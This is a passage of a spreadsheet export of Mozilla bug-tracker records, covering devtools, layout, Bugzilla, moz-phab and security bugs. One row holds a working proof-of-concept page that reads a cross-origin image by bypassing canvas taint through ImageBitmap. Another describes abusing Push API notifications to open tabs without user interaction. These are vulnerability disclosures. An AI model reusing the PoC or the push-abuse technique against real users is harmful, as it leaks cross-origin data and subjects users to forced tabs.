          <t>2018-09-24 13:24:50 -0700</t>
        </is>
      </c>
      <c r="E2705" t="n">
        <v>1</v>
      </c>
      <c r="F2705" t="n">
        <v>1</v>
      </c>
      <c r="G2705" t="n">
        <v>6</v>
      </c>
      <c r="H2705" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2705" t="inlineStr">
        <is>
          <t>DevTools Graveyard</t>
        </is>
      </c>
      <c r="J2705" t="inlineStr">
        <is>
          <t>Graphic Commandline and Toolbar</t>
        </is>
      </c>
      <c r="K2705" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2705" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2705" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2705" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2705" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2705" t="inlineStr">
        <is>
          <t>[reserve-html]</t>
        </is>
      </c>
      <c r="Q2705" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2705" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2705" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T2705" t="n">
        <v>1</v>
      </c>
      <c r="U2705" t="n">
        <v>0</v>
      </c>
      <c r="V2705" t="n">
        <v>11</v>
      </c>
      <c r="W2705" t="inlineStr">
        <is>
          <t>STR:
- open a new tab with url:
  data:text/html,&lt;div class="foo"&gt;&lt;div class="bar"&gt;
- open gcli (shift+F2)
- type the following command:
  inspect .foo
- hit ENTER
Nothing happens, the toolbox doesn't open and the node isn't selected in the inspector.
The following gcli output is displayed: 
Missing or invalid toolbox passed to getHighlighterUtils
And in the browser console (ctrl+shift+J), the following message appears:
Object { isTypedData: true, data: Object, type: "error" } cli.js:2056
Switching the window to non e10s gives a better stack trace in the browser console:
Error: Missing or invalid toolbox passed to getHighlighterUtils
Stack trace:
exports.getHighlighterUtils@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/client/framework/toolbox-highlighter-utils.js:35:11
Toolbox@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/client/framework/toolbox.js:134:27
DevTools.prototype.showToolbox@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/client/framework/devtools.js:418:17
exports.items&lt;.exec@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/client/inspector/inspector-commands.js:27:12
Requisition.prototype.exec/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/cli.js:2085:16
createAsyncFunction/asyncFunction@resource://gre/modules/Task.jsm:243:18
Task_spawn@resource://gre/modules/Task.jsm:168:12
exports.exec@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/util/host.js:64:10
Requisition.prototype.exec@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/cli.js:2084:14
Requisition.prototype.updateExec/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/cli.js:2124:12
promise callback*Requisition.prototype.updateExec@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/cli.js:2123:10
promise callback*GcliActor&lt;.execute&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/server/actors/gcli.js:116:12
generateRequestHandlers/&lt;/handler@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/protocol.js:1046:19
DSC_onPacket@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/server/main.js:1643:15
LocalDebuggerTransport.prototype.send/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/transport/transport.js:569:11
exports.makeInfallible/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/ThreadSafeDevToolsUtils.js:101:14
DevToolsUtils.executeSoon*executeSoon@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/DevToolsUtils.js:33:11
LocalDebuggerTransport.prototype.send@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/transport/transport.js:562:7
Front&lt;.send/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/protocol.js:1207:9
Handler.prototype.process@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:937:23
this.PromiseWalker.walkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:816:7
Promise*this.PromiseWalker.scheduleWalkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:747:11
this.PromiseWalker.schedulePromise@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:779:7
Promise.prototype.then@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:454:5
Front&lt;.send@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/protocol.js:1205:7
Front&lt;.request@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/protocol.js:1225:5
generateRequestMethods/&lt;/frontProto[name]@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/protocol.js:1382:14
addLocalFunctions/&lt;/commandSpec.exec@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/system.js:347:16
Requisition.prototype.exec/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/cli.js:2085:16
createAsyncFunction/asyncFunction@resource://gre/modules/Task.jsm:243:18
Task_spawn@resource://gre/modules/Task.jsm:168:12
exports.exec@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/util/host.js:64:10
Requisition.prototype.exec@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/cli.js:2084:14
Inputter.prototype._handleReturn@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/mozui/inputter.js:560:12
Inputter.prototype.handleKeyUp@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/mozui/inputter.js:459:12
Inputter.prototype.onKeyUp@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/mozui/inputter.js:431:3
EventListener.handleEvent*Inputter@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/shared/gcli/source/lib/gcli/mozui/inputter.js:54:3
promise callback*DeveloperToolbar.prototype.show/this._showPromise&lt;/&lt;/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/client/shared/developer-toolbar.js:456:16
promise callback*DeveloperToolbar.prototype.show/this._showPromise&lt;/&lt;@resource://gre/modules/commonjs/toolkit/loader.js -&gt; resource://devtools/client/shared/developer-toolbar.js:450:14
Handler.prototype.process@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:937:23
this.PromiseWalker.walkerLoop@resource://gre/modules/Promise.jsm -&gt; resource://gre/modules/Promise-backend.js:816:7</t>
        </is>
      </c>
      <c r="X2705" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2706">
      <c r="A2706" t="n">
        <v>313440</v>
      </c>
      <c r="B2706" t="inlineStr">
        <is>
          <t>2005-10-22 22:40:02 -0700</t>
        </is>
      </c>
      <c r="C2706" t="inlineStr">
        <is>
          <t>Missing images or plugins in several popular real estate virtual tours</t>
        </is>
      </c>
      <c r="D2706" t="inlineStr">
        <is>
          <t>2005-10-24 09:18:06 -0700</t>
        </is>
      </c>
      <c r="E2706" t="n">
        <v>1</v>
      </c>
      <c r="F2706" t="n">
        <v>1</v>
      </c>
      <c r="G2706" t="n">
        <v>3</v>
      </c>
      <c r="H2706" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2706" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2706" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2706" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2706" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2706" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2706" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2706" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2706" t="inlineStr"/>
      <c r="Q2706" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2706" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2706" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T2706" t="n">
        <v>1</v>
      </c>
      <c r="U2706" t="n">
        <v>0</v>
      </c>
      <c r="V2706" t="n">
        <v>9</v>
      </c>
      <c r="W2706" t="inlineStr">
        <is>
          <t>&lt;brendan&gt; anyone around able to confirm a regression from firefox 1.0x?
&lt;brendan&gt; http://r2.virtualtourhosting.net/ListingList.php?id=208|detect
&lt;brendan&gt; main left and right panels don't load images
&lt;brendan&gt; i'm on linux, so the panoramic scenes try to load in mplayer, which has its own issues
&lt;brendan&gt; this link works in 1.0x
&lt;brendan&gt; (once you click past the popup-blocker workaround)
&lt;brendan&gt; another popular virtual real estate tour seems busted, let me find an example
&lt;brendan&gt; here: http://tours.tourfactory.com/tours/sizetour.asp?t=235918&amp;sreferer=www.mlslistings.com&amp;home=www.mlsli
&lt;brendan&gt; in 1.0.x, you can click on the 2nd, ... scenes
&lt;brendan&gt; try the last one, the highest tab row, on the left: Back
&lt;brendan&gt; (the back yard)
&lt;brendan&gt; nothing, and the space for the image is vertically collapsed
&lt;brendan&gt; same for all scenes but the first
&lt;brendan&gt; works in 1.0.x
&lt;brendan&gt; not in my trunk build, or in my deer park b2
&lt;gavin&gt; those seem to work fine for me using windows/latest-branch
&lt;gavin&gt; can't help with linux testing, sorry
&lt;gavin&gt; though switching from "html viewer" to "java viewer" and back did cause a hang :(
&lt;brendan&gt; gavin: is this with 1.8branch nightly
&lt;gavin&gt; yes
&lt;gavin&gt; Gecko/20051021 Firefox/1.5
&lt;brendan&gt; try trunk if you can
&lt;brendan&gt; this could be a trunk-only
&lt;brendan&gt; regression
&lt;gavin&gt; with the embed/object changes I'd say that's much more likely
&lt;gavin&gt; ok, first link doesn't load images, using 20051020 trunk
&lt;gavin&gt; second link seems to work fine
&lt;gavin&gt; I'll find a regression range
&lt;brendan&gt; thanks!
&lt;gavin&gt; brendan: http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=PhoenixTinderbox&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2005-10-16+05%3A00&amp;maxdate=2005-10-17+08%3A00&amp;cvsroot=%2Fcvsroot
&lt;gavin&gt; seems like bug 114641 or bug 288064 are likely
/be</t>
        </is>
      </c>
      <c r="X2706" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2707">
      <c r="A2707" t="n">
        <v>1528909</v>
      </c>
      <c r="B2707" t="inlineStr">
        <is>
          <t>2019-02-19 01:11:11 -0800</t>
        </is>
      </c>
      <c r="C2707" t="inlineStr">
        <is>
          <t>ImageBitmap drawn to canvases, does not affect taint</t>
        </is>
      </c>
      <c r="D2707" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:42 -0700</t>
        </is>
      </c>
      <c r="E2707" t="n">
        <v>1</v>
      </c>
      <c r="F2707" t="n">
        <v>1</v>
      </c>
      <c r="G2707" t="n">
        <v>3</v>
      </c>
      <c r="H2707" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2707" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2707" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2707" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2707" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2707" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2707" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2707" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2707" t="inlineStr">
        <is>
          <t>[reporter-external] [original reporter Aayla Secura][adv-main66+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q2707" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2707" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2707" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T2707" t="n">
        <v>1</v>
      </c>
      <c r="U2707" t="n">
        <v>0</v>
      </c>
      <c r="V2707" t="n">
        <v>20</v>
      </c>
      <c r="W2707" t="inlineStr">
        <is>
          <t>New bug report from AaylaSecura, as commented on bug 1526218 comment 26.
Quoting:
I found another way to get a cross-origin image. Not sure if I should open a new bug for this, since it's not related to the bitmap context, or simply rename this one: "Exporting of tainted canvases via ImageBitmap".
Basically, creating an ImageBitmap from the same image (not loaded with CORS support) and then rendering it in a 2D canvas gives JS access to the data. Quite strange, given that drawing the ImageBlob (&lt;img&gt; element) directly onto a 2D canvas gives an "Insecure operation"
PoC (tested on 65.0.1 after msfa2019-04 patch), almost identical to the original one for bitmap canvas:
```
&lt;html&gt;&lt;body&gt;
  &lt;script charset="utf-8"&gt;
    function getData() {
      createImageBitmap(this, 0, 0, this.naturalWidth,
        this.naturalHeight).then(function(bmap) {
        var can = document.createElement('canvas');
        // msfa2019-04 fixed this
        // var ctx = can.getContext('bitmaprenderer');
        // ctx.transferFromImageBitmap(bmap);
        // but not this
        var ctx = can.getContext('2d');
        ctx.drawImage(bmap, 0, 0);
        document.getElementById('result').textContent = can.toDataURL();
        var img = document.getElementById('result_render');
        img.src = can.toDataURL();
        document.body.appendChild(img);
      }); }
  &lt;/script&gt;
  &lt;img style="visibility: hidden" src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/&gt;
  &lt;br/&gt;&lt;textarea readonly style="width:100%;height:10em" id="result"&gt;&lt;/textarea&gt;
  &lt;br/&gt;Re-rendered image: &lt;br/&gt;&lt;img id="result_render"&gt;&lt;/textarea&gt;
&lt;/body&gt;&lt;/html&gt;
```
Perhaps creating an ImageBitmap from a non-CORS image should be forbidden in the first place?</t>
        </is>
      </c>
      <c r="X2707" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2708">
      <c r="A2708" t="n">
        <v>583884</v>
      </c>
      <c r="B2708" t="inlineStr">
        <is>
          <t>2010-08-02 15:27:50 -0700</t>
        </is>
      </c>
      <c r="C2708" t="inlineStr">
        <is>
          <t>User autocomplete fills in empty values instead of the autocomplete value</t>
        </is>
      </c>
      <c r="D2708" t="inlineStr">
        <is>
          <t>2010-08-13 02:34:18 -0700</t>
        </is>
      </c>
      <c r="E2708" t="n">
        <v>1</v>
      </c>
      <c r="F2708" t="n">
        <v>1</v>
      </c>
      <c r="G2708" t="n">
        <v>4</v>
      </c>
      <c r="H2708" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2708" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2708" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2708" t="inlineStr">
        <is>
          <t>4.1</t>
        </is>
      </c>
      <c r="L2708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2708" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2708" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2708" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2708" t="inlineStr"/>
      <c r="Q2708" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2708" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2708" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T2708" t="n">
        <v>1</v>
      </c>
      <c r="U2708" t="n">
        <v>0</v>
      </c>
      <c r="V2708" t="n">
        <v>15</v>
      </c>
      <c r="W2708" t="inlineStr">
        <is>
          <t>For some reason, user autocomplete is now basically broken--when you select a user in the drop-down, instead of getting their username in the input, you get nothing (or in the case of the CC field, you just get a comma and a space).</t>
        </is>
      </c>
      <c r="X2708" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2709">
      <c r="A2709" t="n">
        <v>1605465</v>
      </c>
      <c r="B2709" t="inlineStr">
        <is>
          <t>2019-12-20 12:23:38 -0800</t>
        </is>
      </c>
      <c r="C2709" t="inlineStr">
        <is>
          <t>"moz-phab patch" throws exception when logging "patching revision"</t>
        </is>
      </c>
      <c r="D2709" t="inlineStr">
        <is>
          <t>2019-12-20 13:32:49 -0800</t>
        </is>
      </c>
      <c r="E2709" t="n">
        <v>1</v>
      </c>
      <c r="F2709" t="n">
        <v>1</v>
      </c>
      <c r="G2709" t="n">
        <v>7</v>
      </c>
      <c r="H2709" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2709" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J2709" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K2709" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2709" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2709" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2709" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2709" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2709" t="inlineStr"/>
      <c r="Q2709" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2709" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2709" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2709" t="n">
        <v>1</v>
      </c>
      <c r="U2709" t="n">
        <v>0</v>
      </c>
      <c r="V2709" t="n">
        <v>4</v>
      </c>
      <c r="W2709" t="inlineStr">
        <is>
          <t>### To reproduce:
1. Open a terminal in `mozilla-central`
2. `moz-phab patch D57796`</t>
        </is>
      </c>
      <c r="X2709" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2710">
      <c r="A2710" t="n">
        <v>1429093</v>
      </c>
      <c r="B2710" t="inlineStr">
        <is>
          <t>2018-01-09 07:47:48 -0800</t>
        </is>
      </c>
      <c r="C2710" t="inlineStr">
        <is>
          <t>Push API allows DOM event without user interaction</t>
        </is>
      </c>
      <c r="D2710" t="inlineStr">
        <is>
          <t>2018-08-28 22:56:36 -0700</t>
        </is>
      </c>
      <c r="E2710" t="n">
        <v>1</v>
      </c>
      <c r="F2710" t="n">
        <v>1</v>
      </c>
      <c r="G2710" t="n">
        <v>3</v>
      </c>
      <c r="H2710" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2710" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2710" t="inlineStr">
        <is>
          <t>DOM: Service Workers</t>
        </is>
      </c>
      <c r="K2710" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L2710" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2710" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2710" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2710" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2710" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q2710" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2710" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2710" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T2710" t="n">
        <v>1</v>
      </c>
      <c r="U2710" t="n">
        <v>0</v>
      </c>
      <c r="V2710" t="n">
        <v>47</v>
      </c>
      <c r="W2710" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Steps to reproduce:
I've created an application that uses the notification Push API. In the service worker JS. I've created a listener for the 'NotificationClose' event, which launches a DOM interaction (opens a new tab on browser).
Then, I've registered to the application with Firefox (allowing it to send me push notification). 
Finally, I've sent few consecutive push notifications to the endpoint in a short time (for example 5 notification in 4 seconds).
Example code fro service worker is attached. 
Actual results:
When sending few consecutive notifications, I was able to invoke the 'notification close' event without user interaction. Furthermore, each notification launched a new Tab (invoking a DOM event). 
In essence:
1) If the browser was opened, I was able to remotely open an arbitrary amount of tabs on the browser without user interaction.
2) If the browser was closed, all the tabs open upon next launch.
This behavior puts the user in risk:
1) Adware: If the user once allowed a malicious application to send notification, now the ad providers can launch as many ads as they choose without the user interaction.
2) Persistence for attackers: if once I was able to get a user to register to my app, I can now redirect him to  malicious link (for example containing CSRF or XSS) whenever I choose (for example I will send the user to a CSRF link again and again without his interaction, until he has a valid session with the target application).
3) Client side denial of service: I can launch infinite numbers of tabs every time the user opens the browser, effectively rendering the browser unusable. 
It is important to stress that the user cannot stop the attack once the notifications were allowed, I.e. he cannot prevent the attacker from opening a tab on his browser
Expected results:
Events (such as 'close notification') should require user interaction. Furthermore:
1. close / push events should not allowed DOM interaction (opening a tab, for example). note that this is enforced in Chrome. 
2. DOM intercations should be limited to 'one at a time', and not queued without restriction.</t>
        </is>
      </c>
      <c r="X2710" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2711">
      <c r="A2711" t="n">
        <v>939147</v>
      </c>
      <c r="B2711" t="inlineStr">
        <is>
          <t>2013-11-15 09:49:08 -0800</t>
        </is>
      </c>
      <c r="C2711" t="inlineStr">
        <is>
          <t>[Action Icons - Browser] Remove shadows from action icons</t>
        </is>
      </c>
      <c r="D2711" t="inlineStr">
        <is>
          <t>2013-11-21 06:53:30 -0800</t>
        </is>
      </c>
      <c r="E2711" t="n">
        <v>1</v>
      </c>
      <c r="F2711" t="n">
        <v>1</v>
      </c>
      <c r="G2711" t="n">
        <v>6</v>
      </c>
      <c r="H2711" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2711" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2711" t="inlineStr">
        <is>
          <t>Gaia::Browser</t>
        </is>
      </c>
      <c r="K2711" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2711" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2711" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2711" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2711" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2711" t="inlineStr">
        <is>
          <t>ux-tracking, visual design, visual-tracking, jian</t>
        </is>
      </c>
      <c r="Q2711" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2711" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2711" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2711" t="n">
        <v>1</v>
      </c>
      <c r="U2711" t="n">
        <v>0</v>
      </c>
      <c r="V2711" t="n">
        <v>8</v>
      </c>
      <c r="W2711" t="inlineStr">
        <is>
          <t>Hi Pavel,
Please replace the action icons in this app with the ones that I'll be providing (I'll be attaching new icons to this bug). This is a blocker for Bug 939106. 
Thanks!</t>
        </is>
      </c>
      <c r="X2711" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2712">
      <c r="A2712" t="n">
        <v>1358551</v>
      </c>
      <c r="B2712" t="inlineStr">
        <is>
          <t>2017-04-21 10:11:42 -0700</t>
        </is>
      </c>
      <c r="C2712" t="inlineStr">
        <is>
          <t>Graphite2: use of uninitialized memory [@ graphite2::GlyphCache::Loader::read_glyph]</t>
        </is>
      </c>
      <c r="D2712" t="inlineStr">
        <is>
          <t>2017-10-26 19:19:57 -0700</t>
        </is>
      </c>
      <c r="E2712" t="n">
        <v>1</v>
      </c>
      <c r="F2712" t="n">
        <v>1</v>
      </c>
      <c r="G2712" t="n">
        <v>3</v>
      </c>
      <c r="H2712" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2712" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2712" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2712" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2712" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2712" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2712" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2712" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2712" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q2712" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2712" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2712" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2712" t="n">
        <v>1</v>
      </c>
      <c r="U2712" t="n">
        <v>0</v>
      </c>
      <c r="V2712" t="n">
        <v>6</v>
      </c>
      <c r="W2712" t="inlineStr">
        <is>
          <t>Created attachment 8860472
test_case.ttf
Found while fuzzing graphite commit 0646e4e
The attached test cases triggers multiple instances of uninitialized memory usage. See attached log for full report.
To reproduce:
valgrind -q --track-origins=yes ./gr2fonttest test_case.ttf
Conditional jump or move depends on uninitialised value(s)
   at 0x4130AB: sparse&lt;(anonymous namespace)::_glat_iterator&lt;unsigned short&gt; &gt; (Sparse.h:107)
   by 0x4130AB: GlyphFace&lt;(anonymous namespace)::_glat_iterator&lt;unsigned short&gt; &gt; (GlyphFace.h:74)
   by 0x4130AB: graphite2::GlyphCache::Loader::read_glyph(unsigned short, graphite2::GlyphFace&amp;, int*) const (GlyphCache.cpp:423)
   by 0x411FD7: graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) (GlyphCache.cpp:142)
   by 0x40C7D1: graphite2::Face::readGlyphs(unsigned int) (Face.cpp:98)
   by 0x407A67: load_face (gr_face.cpp:54)
   by 0x407A67: gr_make_face_with_ops (gr_face.cpp:89)
   by 0x4089B8: gr_make_file_face (gr_face.cpp:242)
   by 0x405111: Parameters::testFileFont() const (gr2FontTest.cpp:639)
   by 0x406286: main (gr2FontTest.cpp:802)
 Uninitialised value was created by a heap allocation
   at 0x4C2DBB6: malloc (vg_replace_malloc.c:299)
   by 0x40DBB8: gralloc&lt;unsigned char&gt; (Main.h:88)
   by 0x40DBB8: graphite2::Face::Table::decompress() (Face.cpp:333)
   by 0x40D85A: graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) (Face.cpp:292)
   by 0x414575: graphite2::GlyphCache::Loader::Loader(graphite2::Face const&amp;, bool) (GlyphCache.cpp:270)
   by 0x411A9F: graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) (GlyphCache.cpp:118)
   by 0x40C7D1: graphite2::Face::readGlyphs(unsigned int) (Face.cpp:98)
   by 0x407A67: load_face (gr_face.cpp:54)
   by 0x407A67: gr_make_face_with_ops (gr_face.cpp:89)
   by 0x4089B8: gr_make_file_face (gr_face.cpp:242)
   by 0x405111: Parameters::testFileFont() const (gr2FontTest.cpp:639)
   by 0x406286: main (gr2FontTest.cpp:802)</t>
        </is>
      </c>
      <c r="X2712" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2713">
      <c r="A2713" t="n">
        <v>1268034</v>
      </c>
      <c r="B2713" t="inlineStr">
        <is>
          <t>2016-04-27 07:33:26 -0700</t>
        </is>
      </c>
      <c r="C2713" t="inlineStr">
        <is>
          <t>Assertion failure: isObject(), at dist/include/js/Value.h:1281</t>
        </is>
      </c>
      <c r="D2713" t="inlineStr">
        <is>
          <t>2017-02-09 07:55:59 -0800</t>
        </is>
      </c>
      <c r="E2713" t="n">
        <v>1</v>
      </c>
      <c r="F2713" t="n">
        <v>1</v>
      </c>
      <c r="G2713" t="n">
        <v>3</v>
      </c>
